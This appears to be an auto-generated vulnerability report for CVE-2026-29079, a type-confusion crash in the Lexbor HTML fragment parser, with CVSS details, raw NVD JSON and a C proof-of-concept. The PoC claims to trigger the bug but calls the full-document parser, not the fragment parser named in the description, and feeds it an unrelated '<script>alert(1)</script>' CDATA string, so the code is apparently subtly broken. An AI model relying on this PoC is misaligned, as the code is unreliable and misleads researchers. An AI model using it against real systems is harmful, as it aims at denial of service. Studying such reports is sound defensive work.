Security Vulnerability Report
CVE-2026-29079 CVSS 7.5 HIGH

Published: 2026-03-13 19:54:33
Last Modified: 2026-03-18 20:20:53

Description

Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:lexbor:lexbor:*:*:*:*:*:*:*:* - VULNERABLE
Lexbor < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-29079 PoC - Type Confusion in Lexbor HTML Fragment Parser
// This PoC demonstrates the type confusion vulnerability in Lexbor's HTML fragment parser
#include <stdio.h>   // printf
#include <string.h>  // strlen
#include <lexbor/html/parser.h>

int main(void)
{
    lxb_html_parser_t *parser;
    lxb_html_document_t *document;
    lxb_status_t status;

    // Initialize the HTML parser
    parser = lxb_html_parser_create();
    status = lxb_html_parser_init(parser);
    if (status != LXB_STATUS_OK) {
        // Release the parser object before bailing out
        lxb_html_parser_destroy(parser);
        return -1;
    }

    // Malicious HTML fragment that triggers the type confusion
    // When ns = UNDEF, comment data is written to element fields
    const char *malicious_html = "<div><![CDATA[<script>alert(1)</script>]]></div>";

    // Parse the malicious HTML fragment
    document = lxb_html_parse(parser, (const lxb_char_t *)malicious_html,
                              strlen(malicious_html));
    if (document == NULL) {
        printf("Parsing failed or triggered vulnerability\n");
    } else {
        printf("Document parsed - may still contain corrupted data\n");
        lxb_html_document_destroy(document);
    }

    lxb_html_parser_destroy(parser);
    return 0;
}

References

https://github.com/lexbor/lexbor/security/advisories/GHSA-mrpr-v36q-2vp8 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29079", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:32.747", "lastModified": "2026-03-18T20:20:53.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0."}, {"lang": "es", "value": "Lexbor es una biblioteca de motor de navegador web. Antes de la versión 2.7.0, existe una vulnerabilidad de confusión de tipos en el analizador de fragmentos HTML de Lexbor. Cuando ns = UNDEF, se crea un comentario utilizando el constructor de 'elemento desconocido'. Los datos del comentario se escriben en los campos del elemento a través de una conversión insegura, corrompiendo el campo qualified_name. Ese valor corrupto se utiliza posteriormente como puntero y se desreferencia cerca de la página cero. Esta vulnerabilidad se corrigió en la versión 2.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lexbor:lexbor:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.0", "matchCriteriaId": "431D7C04-4D6F-4F52-8EAA-60DD304831BD"}]}]}], "references": [{"url": "https://github.com/lexbor/lexbor/security/advisories/GHSA-mrpr-v36q-2vp8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}